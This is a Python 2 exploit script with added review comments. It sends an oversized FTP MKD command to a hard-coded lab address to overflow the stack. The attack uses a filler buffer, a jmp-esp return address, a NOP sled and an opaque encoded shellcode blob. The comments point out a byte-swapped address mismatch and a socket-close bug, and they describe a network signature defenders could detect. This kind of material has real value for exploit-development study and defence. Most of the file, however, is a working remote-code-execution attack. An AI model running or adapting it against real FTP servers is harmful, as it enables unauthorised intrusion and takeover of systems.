#!/usr/bin/python

import socket
import sys

#------------------------------------------
#Badchars: \x00\x0A\x0D
#0x77c35459: push esp # ret | shell32.dll
#0x7C5a8265: jmp esp # ret | ntdll.dll
#------------------------------------------
# Review notes on the header above:
#  - "Badchars" lists the byte values the author keeps out of the payload
#    (NUL, LF, CR); this is consistent with the FTP command being a
#    "\r\n"-terminated string further down.
#  - Two candidate return addresses are listed; only one 4-byte value is
#    actually spliced into `evil` below.
#
# `shellcode` is an opaque, encoded byte string (a Python 2 str literal;
# the whole file is Python 2 -- see the print statement below).
# Nothing in this listing decodes it, so its runtime behaviour cannot be
# determined from here.
shellcode = ("\xd9\xce\xd9\x74\x24\xf4\x58\xbd\xcd\x94\xae\xab\x2b\xc9\xb1"
"\x56\x31\x68\x18\x03\x68\x18\x83\xe8\x31\x76\x5b\x57\x21\xfe"
"\xa4\xa8\xb1\x61\x2c\x4d\x80\xb3\x4a\x05\xb0\x03\x18\x4b\x38"
"\xef\x4c\x78\xcb\x9d\x58\x8f\x7c\x2b\xbf\xbe\x7d\x9d\x7f\x6c"
"\xbd\xbf\x03\x6f\x91\x1f\x3d\xa0\xe4\x5e\x7a\xdd\x06\x32\xd3"
"\xa9\xb4\xa3\x50\xef\x04\xc5\xb6\x7b\x34\xbd\xb3\xbc\xc0\x77"
"\xbd\xec\x78\x03\xf5\x14\xf3\x4b\x26\x24\xd0\x8f\x1a\x6f\x5d"
"\x7b\xe8\x6e\xb7\xb5\x11\x41\xf7\x1a\x2c\x6d\xfa\x63\x68\x4a"
"\xe4\x11\x82\xa8\x99\x21\x51\xd2\x45\xa7\x44\x74\x0e\x1f\xad"
"\x84\xc3\xc6\x26\x8a\xa8\x8d\x61\x8f\x2f\x41\x1a\xab\xa4\x64"
"\xcd\x3d\xfe\x42\xc9\x66\xa5\xeb\x48\xc3\x08\x13\x8a\xab\xf5"
"\xb1\xc0\x5e\xe2\xc0\x8a\x36\xc7\xfe\x34\xc7\x4f\x88\x47\xf5"
"\xd0\x22\xc0\xb5\x99\xec\x17\xb9\xb0\x49\x87\x44\x3a\xaa\x81"
"\x82\x6e\xfa\xb9\x23\x0e\x91\x39\xcb\xdb\x36\x6a\x63\xb3\xf6"
"\xda\xc3\x63\x9f\x30\xcc\x5c\xbf\x3a\x06\xeb\x87\xf4\x72\xb8"
"\x6f\xf5\x84\x19\x74\x70\x62\x0f\x64\xd4\x3c\xa7\x46\x03\xf5"
"\x50\xb8\x61\xa9\xc9\x2e\x3d\xa7\xcd\x51\xbe\xed\x7e\xfd\x16"
"\x66\xf4\xed\xa2\x97\x0b\x38\x83\xde\x34\xab\x59\x8f\xf7\x4d"
"\x5d\x9a\x6f\xed\xcc\x41\x6f\x78\xed\xdd\x38\x2d\xc3\x17\xac"
"\xc3\x7a\x8e\xd2\x19\x1a\xe9\x56\xc6\xdf\xf4\x57\x8b\x64\xd3"
"\x47\x55\x64\x5f\x33\x09\x33\x09\xed\xef\xed\xfb\x47\xa6\x42"
"\x52\x0f\x3f\xa9\x65\x49\x40\xe4\x13\xb5\xf1\x51\x62\xca\x3e"
"\x36\x62\xb3\x22\xa6\x8d\x6e\xe7\xd6\xc7\x32\x4e\x7f\x8e\xa7"
"\xd2\xe2\x31\x12\x10\x1b\xb2\x96\xe9\xd8\xaa\xd3\xec\xa5\x6c"
"\x08\x9d\xb6\x18\x2e\x32\xb6\x08")

# `buffer` (which shadows the Python 2 builtin of that name) prefixes the
# payload with 20 bytes of 0x90 (x86 NOP).
buffer = "\x90"*20 + shellcode

# MKD argument layout: 247 filler bytes, a 4-byte value at the position the
# header comments associate with the saved return address, the NOP run plus
# payload, then "C" padding so the argument is always exactly 1000 bytes.
# NOTE(review): "\x65\x82\xa5\x7c" read little-endian is 0x7ca58265, which
# does not match the 0x7C5a8265 written in the header comment above -- the
# two values differ by a swapped byte, so one of them is a typo.
evil = "A"*247 + "\x65\x82\xa5\x7c" + buffer + "C"*(749-len(buffer))
# Sanity check only: len(buffer) cancels out, so this always prints 1000.
# (Python 2 print statement.)
print 247+4+(749-len(buffer))+len(buffer)

# Plain TCP connection to a hard-coded lab address (192.168.2.130:21).
# There is no argument parsing; the `sys` import at the top is unused.
# socket.connect() returns None, so the `connect` name is never useful.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.2.130",21))

# Scripted FTP exchange: read the banner, anonymous login, then the
# oversized MKD. Every recv() blocks with no timeout and each reply is
# discarded, so a failed login or a closed connection is not detected.
# On the wire this is a distinctive pattern for a defender: an anonymous
# login immediately followed by a ~1000-byte MKD argument containing
# non-printable bytes -- an FTP command-length / non-ASCII-argument rule
# would catch it.
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS a@a\r\n")
s.recv(1024)
s.send('MKD ' + evil + '\r\n')
s.recv(1024)
s.send('QUIT\r\n')
# BUG: `s.close` without parentheses only references the bound method; the
# socket is never explicitly closed. Should be `s.close()`.
s.close

